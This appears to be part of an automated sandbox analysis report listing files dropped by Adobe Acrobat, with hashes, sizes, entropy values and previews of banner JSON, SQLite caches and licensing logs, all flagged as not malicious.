                            SHA1:DA03A52E9C612FB8A4C30ACDEDEAF54BC92EA2BF
                            SHA-256:601C6C950134B41C6A319AC3BCB6CCE50F205A11786F2375332E67174AAFDA7A
                            SHA-512:012C43EF3414B8B2267EFB525C0645DA7267637D6190183EBB62C3477EF06369F83FEE45C107D6F49281B58A8A059C89883033E5AA17C67FC1C5933E7E930669
                            Malicious:false
                            Preview:{"analyticsData":{"responseGUID":"75deedfd-c641-473a-ae30-705027075498","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1734658037326,"statusCode":200,"surfaceID":"DC_Reader_Convert_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Convert_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_1","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"d5bba1ae-6009-4d23-8886-fd4a474b8ac9","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Convert_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IkNvbnZlcnRQREZSZHJSSFBBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkV4cG9ydCBQREZzIHRvIE1pY3Jvc29mdCBXb3JkIGFuZCBFeGNlbC4ifSwidGNh
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                            File Type:JSON data
                            Category:dropped
                            Size (bytes):289
                            Entropy (8bit):5.295690358799488
                            Encrypted:false
                            SSDEEP:6:YEQXJ2HXJRRaW9Kme5IRR4UhUR0YeyKoAvJf8dPeUkwRe9:YvXKXJREaK9WRuUhU55GU8Ukee9
                            MD5:529216E770603189BC97811B6BD7C4B7
                            SHA1:889156616391F75E81E86883A98B602CFBEE27FF
                            SHA-256:9EA827B4308A930B2A67C72D09ABC0DCEEF371B334D6DBC25F3F145DB182B36D
                            SHA-512:849D2F9EB1A937226819F6354E47A4EEBB98C15E0E8E8966A769A7745615615C832C181F8A8ED947314B8A77021CE17C54AC626E7A1B4E0BA46070673E2F7499
                            Malicious:false
                            Preview:{"analyticsData":{"responseGUID":"75deedfd-c641-473a-ae30-705027075498","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1734658037326,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                            File Type:JSON data
                            Category:dropped
                            Size (bytes):292
                            Entropy (8bit):5.298112261349305
                            Encrypted:false
                            SSDEEP:6:YEQXJ2HXJRRaW9Kme5IRR4UhUR0YeyKoAvJfQ1rPeUkwRe9:YvXKXJREaK9WRuUhU55GY16Ukee9
                            MD5:088A97F52667B4CF2CCF8932BD48C164
                            SHA1:DC920B3CD902314196490EC0C9E796C3EFB3F64D
                            SHA-256:354B9C1E1E0F1259ABAF51EC45D990A41F81FD29FC617F4110E3180EA1864925
                            SHA-512:4DE1B40E03865948596B38A839A0DAF57421067F10A0E326F1F28F9A147B6CFF32D39C4750333EA86C7F23EBD31160D566D0C536F65812EB6279195513B23002
                            Malicious:false
                            Preview:{"analyticsData":{"responseGUID":"75deedfd-c641-473a-ae30-705027075498","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1734658037326,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                            File Type:JSON data
                            Category:dropped
                            Size (bytes):289
                            Entropy (8bit):5.303657505692781
                            Encrypted:false
                            SSDEEP:6:YEQXJ2HXJRRaW9Kme5IRR4UhUR0YeyKoAvJfFldPeUkwRe9:YvXKXJREaK9WRuUhU55Gz8Ukee9
                            MD5:A65248EEC45FD57BBA8F6FB0F7801B76
                            SHA1:9D8F25DE10461A74A2302E13233FB274FAAAA1FD
                            SHA-256:4DEE9454C3AADE7B4207FE0DAEC3696456671EBB3893CB418DA7FE8D0BEB3BCC
                            SHA-512:57000C55EBA7AB18FC287A0484A4BC066D1A04A6D34AA8183F777ABA5A98A7702B372CC45EBE0371AB0A57753B28BBF91E5D4875E57B3DD7CBDED24A61071B1C
                            Malicious:false
                            Preview:{"analyticsData":{"responseGUID":"75deedfd-c641-473a-ae30-705027075498","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1734658037326,"statusCode":200,"surfaceID":"DC_Reader_Edit_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                            File Type:JSON data
                            Category:dropped
                            Size (bytes):295
                            Entropy (8bit):5.3205354528966495
                            Encrypted:false
                            SSDEEP:6:YEQXJ2HXJRRaW9Kme5IRR4UhUR0YeyKoAvJfzdPeUkwRe9:YvXKXJREaK9WRuUhU55Gb8Ukee9
                            MD5:3873212E8353633F5A669BAE74521F39
                            SHA1:39F3EE2265485E5DC46C106DBC6A5F29427AB617
                            SHA-256:AB6040E25B4227A63CECD41D93185DE3E9276139A9A5BDC474247DE238982CCD
                            SHA-512:C03A2182320640AC52EE4FFBFFDCB7ABE75263AAE212C9316E005230F07C44A59AD2727C53D87BB2693E196E1445140BE1F54BC94277102741BE8B5514215747
                            Malicious:false
                            Preview:{"analyticsData":{"responseGUID":"75deedfd-c641-473a-ae30-705027075498","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1734658037326,"statusCode":200,"surfaceID":"DC_Reader_Home_LHP_Trial_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                            File Type:JSON data
                            Category:dropped
                            Size (bytes):289
                            Entropy (8bit):5.301203524361923
                            Encrypted:false
                            SSDEEP:6:YEQXJ2HXJRRaW9Kme5IRR4UhUR0YeyKoAvJfYdPeUkwRe9:YvXKXJREaK9WRuUhU55Gg8Ukee9
                            MD5:30F574C7B349C37C6A48FAD3D7AE85C1
                            SHA1:3B5489A81C92A9BBC2DBD7DA72CF9BE102C0A013
                            SHA-256:9EE55CDDB84FBC9AAD93AB9EC0E6FE0F8D458FDF092C3F5116953C1103E8CD45
                            SHA-512:3349924472C3705BAC122FB0A7CEE878D75209AF39442A49EF449AABCE2A1818CDABE5357F50AE9246DE551EE895B471D14B500CCBA5D3108F07E483C1548AF7
                            Malicious:false
                            Preview:{"analyticsData":{"responseGUID":"75deedfd-c641-473a-ae30-705027075498","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1734658037326,"statusCode":200,"surfaceID":"DC_Reader_More_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                            File Type:JSON data
                            Category:dropped
                            Size (bytes):284
                            Entropy (8bit):5.287856439614446
                            Encrypted:false
                            SSDEEP:6:YEQXJ2HXJRRaW9Kme5IRR4UhUR0YeyKoAvJf+dPeUkwRe9:YvXKXJREaK9WRuUhU55G28Ukee9
                            MD5:488A0CD4C5D9A8C2445356AD82BD082F
                            SHA1:B97F620D1EDFEA9173DF748E3E2CE23F7CC8B06F
                            SHA-256:62ED721FAC8113A1D157E966FA23D57B4AF9699C441E2DE1F0283BED94ACA055
                            SHA-512:53481A3F3E572A58C06583EAB1AAB3808B59A82170AEF865FF6E3D5844222D3E6EB69557EA9663E6D22DE7D437B08342BFB6937371B4228C677182E2BE4FA22A
                            Malicious:false
                            Preview:{"analyticsData":{"responseGUID":"75deedfd-c641-473a-ae30-705027075498","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1734658037326,"statusCode":200,"surfaceID":"DC_Reader_RHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                            File Type:JSON data
                            Category:dropped
                            Size (bytes):291
                            Entropy (8bit):5.284742350390688
                            Encrypted:false
                            SSDEEP:6:YEQXJ2HXJRRaW9Kme5IRR4UhUR0YeyKoAvJfbPtdPeUkwRe9:YvXKXJREaK9WRuUhU55GDV8Ukee9
                            MD5:B0E7E5E100D36A07408C2DBFE4291A80
                            SHA1:F18898BF74C4308ADA1753E3BA622E9912D76AF3
                            SHA-256:38CC6B82984900467514BF7B182F7B748ADEA3B1F33D5FDAF99C9E4566956E48
                            SHA-512:9EC4C3994073BC703EC99283B782263347009B7C0290C08763AA2E633ECFCCD2DF312542B6A7F47588F8C07DD68CF137CA6F12B1EB9919C98172043351714205
                            Malicious:false
                            Preview:{"analyticsData":{"responseGUID":"75deedfd-c641-473a-ae30-705027075498","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1734658037326,"statusCode":200,"surfaceID":"DC_Reader_RHP_Intent_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                            File Type:JSON data
                            Category:dropped
                            Size (bytes):287
                            Entropy (8bit):5.288140329278713
                            Encrypted:false
                            SSDEEP:6:YEQXJ2HXJRRaW9Kme5IRR4UhUR0YeyKoAvJf21rPeUkwRe9:YvXKXJREaK9WRuUhU55G+16Ukee9
                            MD5:79CED5A07951CE56CDC073519DC8DCB0
                            SHA1:77591EBE9C40CC60BB751D9DAD0B3875298DC142
                            SHA-256:628A6F22AC9923F1980256BD66C48B1FEC0ECA27A7DB0C104DFE674ABCBBD7AF
                            SHA-512:6A8FC8028D1738ED478E777050808BAC3D6ADB4A118C5A297B2EB0D2EF67378387CF31DEEB53774EE0E6B6BBA0A3E9E5F08D10BDB247C2E56838755396DA9BF4
                            Malicious:false
                            Preview:{"analyticsData":{"responseGUID":"75deedfd-c641-473a-ae30-705027075498","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1734658037326,"statusCode":200,"surfaceID":"DC_Reader_RHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                            File Type:JSON data
                            Category:dropped
                            Size (bytes):1090
                            Entropy (8bit):5.662407124398873
                            Encrypted:false
                            SSDEEP:24:Yv6XdUIamXayLgE+cNDxeNaqnAvz7xHn0RCmK8czOC/BSXZ:YvSUOBgkDMUJUAh8cvMJ
                            MD5:66BA7FB0A9C0D901ABD2B42DB2BED490
                            SHA1:32C68C13DBD24EC0CCA51880605765053FAB0C83
                            SHA-256:D401E12D878F4EECC4DCF9E4731D2C1D6F64066D986E5BC57BE1E14DFADA4BB4
                            SHA-512:BB9092FE263B2BF99F3123E92DE5A4782C6C29140311D57C9C7192D845E07E93D8663E3A528E277F6B2E02633AA52E54BCCA0A23502FA7EDBCCD12B545CB61DB
                            Malicious:false
                            Preview:{"analyticsData":{"responseGUID":"75deedfd-c641-473a-ae30-705027075498","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1734658037326,"statusCode":200,"surfaceID":"DC_Reader_Sign_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Sign_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_0","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"266234d2-130d-426e-8466-c7a061db101f","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Sign_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IlVwZ3JhZGVSSFBSZHJBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkVhc2lseSBmaWxsIGFuZCBzaWduIFBERnMuIn0sInRjYXRJZCI6bnVsbH0=","dataType":"app
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                            File Type:JSON data
                            Category:dropped
                            Size (bytes):286
                            Entropy (8bit):5.2632171922646345
                            Encrypted:false
                            SSDEEP:6:YEQXJ2HXJRRaW9Kme5IRR4UhUR0YeyKoAvJfshHHrPeUkwRe9:YvXKXJREaK9WRuUhU55GUUUkee9
                            MD5:05FE1AE2BA60430475E8C3CD92D0CD43
                            SHA1:F4AB7A7233F163F10EB94EE9F6D366981E18B18F
                            SHA-256:24D8265E5907CE243CF2E674DD59AF64248591ACCB6DB4EEA5D0A87AF06ABE8C
                            SHA-512:06563AB6027E0EB168DC8B584B93C08195289C1AF561ADA6249D05B35A4370861DE23378C92C82CA355A0958ADD2A4EDBE4A972349BB432549A72C8464869953
                            Malicious:false
                            Preview:{"analyticsData":{"responseGUID":"75deedfd-c641-473a-ae30-705027075498","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1734658037326,"statusCode":200,"surfaceID":"DC_Reader_Upsell_Cards","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                            File Type:JSON data
                            Category:dropped
                            Size (bytes):282
                            Entropy (8bit):5.273306461318638
                            Encrypted:false
                            SSDEEP:6:YEQXJ2HXJRRaW9Kme5IRR4UhUR0YeyKoAvJTqgFCrPeUkwRe9:YvXKXJREaK9WRuUhU55GTq16Ukee9
                            MD5:DF98EBA5AE881EB33EDDA5B5FC3CB235
                            SHA1:9363C92742050264BA48FC9146BE3A6BC31071F0
                            SHA-256:8E12ECED3827CF6E963A8E833A86A184D70FA83F1E32515BF5CE45F192138435
                            SHA-512:5E1BF39E72E7F4036EB14090B3AF4207BFB6C047C5AB43F25BBF88702EFDD66EB7D0325D950198C70BCBAA9FDC13E961B05B9F0AB3688902CF1F1F2001F03029
                            Malicious:false
                            Preview:{"analyticsData":{"responseGUID":"75deedfd-c641-473a-ae30-705027075498","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1734658037326,"statusCode":200,"surfaceID":"Edit_InApp_Aug2020","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):4
                            Entropy (8bit):0.8112781244591328
                            Encrypted:false
                            SSDEEP:3:e:e
                            MD5:DC84B0D741E5BEAE8070013ADDCC8C28
                            SHA1:802F4A6A20CBF157AAF6C4E07E4301578D5936A2
                            SHA-256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
                            SHA-512:65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
                            Malicious:false
                            Preview:....
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                            File Type:JSON data
                            Category:dropped
                            Size (bytes):2814
                            Entropy (8bit):5.129588488762751
                            Encrypted:false
                            SSDEEP:24:YhFqxR9aZayYZhtUEdjr4gY88Ox8Al3WxbEkWjDj0SCUkQgFR242LSCmCU3Bx5+C:Y73Edja8u6WaP83FnjDk5sk79Y
                            MD5:523EB008919453CD54FC7C027699BC38
                            SHA1:98825E5B9A2585FEBF695652D4831D18A4D8D163
                            SHA-256:F23F515DCDD67BEEB0521CB3AE5240E35A2E237667F76483CD329A95AC36B8BF
                            SHA-512:00AD22C6318454C339254FDABF9A71D5F40400C6C9705351EC71C75046BE75362B7E942FCBD1D76D10837F3418E37AA297D2F768238B137D159CD28C9BCE36B9
                            Malicious:false
                            Preview:{"all":[{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"ed52a91c40ab558899d764d099844c3d","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":289,"ts":1734480108000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"dea4e0d8cb5bcf7ab2fa4bc8bf9450df","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":1090,"ts":1734480106000},{"id":"DC_Reader_Convert_LHP_Banner","info":{"dg":"7cd253d6d080dc32c8a4cd586affc10d","sid":"DC_Reader_Convert_LHP_Banner"},"mimeType":"file","size":1123,"ts":1734480106000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"af7e383791eea452beb412732ac20f71","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":295,"ts":1734480106000},{"id":"DC_Reader_Disc_LHP_Retention","info":{"dg":"20729d8fbccdc1f670e632ee36519b96","sid":"DC_Reader_Disc_LHP_Retention"},"mimeType":"file","size":292,"ts":1734480106000},{"id":"DC_Reader_More_LHP_Banner","info":{"dg":"3fcf4b0ea2d655494e3fc34d97bf3211","sid":"DC_Reader_More_LHP_Banner"},"mimeType":"file","
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                            File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 19, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 19
                            Category:dropped
                            Size (bytes):12288
                            Entropy (8bit):0.9880790239614362
                            Encrypted:false
                            SSDEEP:24:TLHRx/XYKQvGJF7urs67Y9QmQ6QejxIcLESiAie7xF:TVl2GL7ms67YXtrjqcI8nD
                            MD5:C8AABF24E705B27185486A6D342FFDB6
                            SHA1:6A2F6B236847F43F66B454C09F6BF69B06FB0BA9
                            SHA-256:A72695306988655215831587F2D098CE1961D9451A69BA87E44386E5D7171B94
                            SHA-512:5B96C183DFBEF31F87D5F7666BA3FCA915F5494B3F7E44084A76CCD077561201D3E13BEFD605C6F0C6B5EB3AF6B3E349A94B3147F02E3057D12EE82F42E31D8F
                            Malicious:false
                            Preview:SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                            File Type:SQLite Rollback Journal
                            Category:dropped
                            Size (bytes):8720
                            Entropy (8bit):1.341875115440509
                            Encrypted:false
                            SSDEEP:24:7+ttASY9QmQ6Qejx7cLESiAi0mY9QrpqLBx/XYKQvGJF7ursr:7MtlYXtrjlcI8KYQqll2GL7msr
                            MD5:706E83D27649328833EFBB6F4559D919
                            SHA1:4C8B44020AF76EFD2A0D805277B290424CAB4D67
                            SHA-256:1D0E4F65D5B432BB955392CED5726F1EC80E02DBC33AF33BB5BDBE3A08D3C9F6
                            SHA-512:4F64E9044711C800C64C992C5BF05EA4D62080DBB7451AA26D722CBD2424959D0964D141232EC40B277C7D50F86BD7B1EDFCA9E225BC37AAF4FFD3E2BB99495B
                            Malicious:false
                            Preview:.... .c.....U,........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................j...#..#.#.#.#.#.#.#.#.7.7........................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):66726
                            Entropy (8bit):5.392739213842091
                            Encrypted:false
                            SSDEEP:768:RNOpblrU6TBH44ADKZEg7Zij/P2mf5M83K0xNyGL5Uv0R+Yyu:6a6TZ44ADE7ZMP2mht3xq0IK
                            MD5:290B574FF1F71566DC7CF5F1FBDDD80F
                            SHA1:8595C0356DD5325EE2AA4D827363E4D110F1BD97
                            SHA-256:C4A4CD8634B9B4B3BDAC3473B38AEDE2C85DBF1339EC56010D1083FC19C6361A
                            SHA-512:31EB2C35C92A6363B915F17B1502D51F5F0E80A773F63A419B6D3BD29CC05209EDF408EABED74D943CB903A322C92B0724278719E796E9E1EBA914D4E64186A9
                            Malicious:false
                            Preview:4.397.90.FID.2:o:..........:F:AgencyFB-Reg.P:Agency FB.L:$.........................."F:Agency FB.#.96.FID.2:o:..........:F:AgencyFB-Bold.P:Agency FB Bold.L:%.........................."F:Agency FB.#.84.FID.2:o:..........:F:Algerian.P:Algerian.L:$..........................RF:Algerian.#.95.FID.2:o:..........:F:ArialNarrow.P:Arial Narrow.L:$.........................."F:Arial Narrow.#.109.FID.2:o:..........:F:ArialNarrow-Italic.P:Arial Narrow Italic.L:$.........................."F:Arial Narrow.#.105.FID.2:o:..........:F:ArialNarrow-Bold.P:Arial Narrow Bold.L:%.........................."F:Arial Narrow.#.118.FID.2:o:..........:F:ArialNarrow-BoldItalic.P:Arial Narrow Bold Italic.L:%.........................."F:Arial Narrow.#.77.FID.2:o:..........:F:ArialMT.P:Arial.L:$.........................."F:Arial.#.91.FID.2:o:..........:F:Arial-ItalicMT.P:Arial Italic.L:$.........................."F:Arial.#.87.FID.2:o:..........:F:Arial-BoldMT.P:Arial Bold.L:$.........................."F:Arial.#.100.FID.2
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):246
                            Entropy (8bit):3.5004142083842487
                            Encrypted:false
                            SSDEEP:6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K8Aa3v:Qw946cPbiOxDlbYnuRKy
                            MD5:90C2A8AE32F49476DB0C4BB365D3732A
                            SHA1:0DFC67DB81A32CCB8C63FF85961D867EFA51F893
                            SHA-256:EECD5440DC46ECEC38DAAD3982E731BEBF2142B8DEDB69C72C1F4E5FEB044BD4
                            SHA-512:4C2CFBA1A1D93CCF80909625C9051027879B1681FF835CA861727D20D5E0F9F08596C2B33270345F4BE62F177619EA689EC47E3BE27832E55B51F4F516188611
                            Malicious:false
                            Preview:..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .1.7./.1.2./.2.0.2.4. . .1.9.:.0.1.:.4.4. .=.=.=.....
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                            File Type:ASCII text, with very long lines (393)
                            Category:dropped
                            Size (bytes):16525
                            Entropy (8bit):5.353642815103214
                            Encrypted:false
                            SSDEEP:384:tbxtsuP+XEWJJQbnR8L31M7HeltV+KYm3wsa2KjF4ODkr/O8r2IUHUHMWwEyZRN2:aPL
                            MD5:91F06491552FC977E9E8AF47786EE7C1
                            SHA1:8FEB27904897FFCC2BE1A985D479D7F75F11CEFC
                            SHA-256:06582F9F48220653B0CB355A53A9B145DA049C536D00095C57FCB3E941BA90BB
                            SHA-512:A63E6E0D25B88EBB6602885AB8E91167D37267B24516A11F7492F48876D3DDCAE44FFC386E146F3CF6EB4FA6AF251602143F254687B17FCFE6F00783095C5082
                            Malicious:false
                            Preview:SessionID=ec4bacf2-5410-40d4-850b-5ac338f864f3.1696585143072 Timestamp=2023-10-06T11:39:03:072+0200 ThreadID=6404 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=ec4bacf2-5410-40d4-850b-5ac338f864f3.1696585143072 Timestamp=2023-10-06T11:39:03:072+0200 ThreadID=6404 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=ec4bacf2-5410-40d4-850b-5ac338f864f3.1696585143072 Timestamp=2023-10-06T11:39:03:072+0200 ThreadID=6404 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=ec4bacf2-5410-40d4-850b-5ac338f864f3.1696585143072 Timestamp=2023-10-06T11:39:03:073+0200 ThreadID=6404 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=ec4bacf2-5410-40d4-850b-5ac338f864f3.1696585143072 Timestamp=2023-10-06T11:39:03:073+0200 ThreadID=6404 Component=ngl-lib_NglAppLib Description="SetConfig:
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                            File Type:ASCII text, with very long lines (393), with CRLF line terminators
                            Category:dropped
                            Size (bytes):15114
                            Entropy (8bit):5.346904245365228
                            Encrypted:false
                            SSDEEP:384:kWCb6+HCfzM10a/K9CU3yICqiZuSDAodR6kIiK5AtpIOkHQJHZmIsNd8FbN2Ojza:nrZ
                            MD5:50060FFB03CCB78BD734CF9318811591
                            SHA1:1BB1C35A786DDA8149598CAFBC006AEE15255BE7
                            SHA-256:40E696D546332B44F7389FE1345011B208CE28A74960CB8BEF4521C04AE913D2
                            SHA-512:26D85291E5688EFE973AB6F6CD70F4BA3AAD2A4F25E9367689071B6EDBE22E2C9630C884E0F14C77D760A3768FAD66663A7E82931B697781794D5C7851D7C4D5
                            Malicious:false
                            Preview:SessionID=3e4fc177-321c-4def-b35f-817482e38238.1734480098642 Timestamp=2024-12-17T19:01:38:642-0500 ThreadID=6348 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"..SessionID=3e4fc177-321c-4def-b35f-817482e38238.1734480098642 Timestamp=2024-12-17T19:01:38:644-0500 ThreadID=6348 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"..SessionID=3e4fc177-321c-4def-b35f-817482e38238.1734480098642 Timestamp=2024-12-17T19:01:38:644-0500 ThreadID=6348 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"..SessionID=3e4fc177-321c-4def-b35f-817482e38238.1734480098642 Timestamp=2024-12-17T19:01:38:644-0500 ThreadID=6348 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1"..SessionID=3e4fc177-321c-4def-b35f-817482e38238.1734480098642 Timestamp=2024-12-17T19:01:38:644-0500 ThreadID=6348 Component=ngl-lib_NglAppLib Description="SetConf
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                            File Type:ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):29752
                            Entropy (8bit):5.4206086626226115
                            Encrypted:false
                            SSDEEP:192:0cbgIhPcbocbAIlncb2cbwI/RcbNcbQIVvcbXcbuIWgcb5:fhWlA/TVhWH
                            MD5:907D09D3E767181339F23BC327AEE154
                            SHA1:9BD90494DC2F61C9E66A0D0F6DDFEE799AC5AB51
                            SHA-256:140592213284F735D6C25A6AB5385FBE1290DB6CF894ABA05B24B1C95BC2FD83
                            SHA-512:B59AEA6D3193C7B6DCA42C70282781D8DE2769887D4ABDCBDB4950E61A830D2CF88A921A1AC921432A8E20173E6DEB07A735EA593E4A7BDA9C9D98EF1D9F641B
                            Malicious:false
                            Preview:06-10-2023 10:08:42:.---2---..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : ***************************************..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : ***************************************..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : ******** Starting new session ********..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : Starting NGL..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..06-10-2023 10:08:42:.Closing File..06-10-
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                            File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
                            Category:dropped
                            Size (bytes):386528
                            Entropy (8bit):7.9736851559892425
                            Encrypted:false
                            SSDEEP:6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m
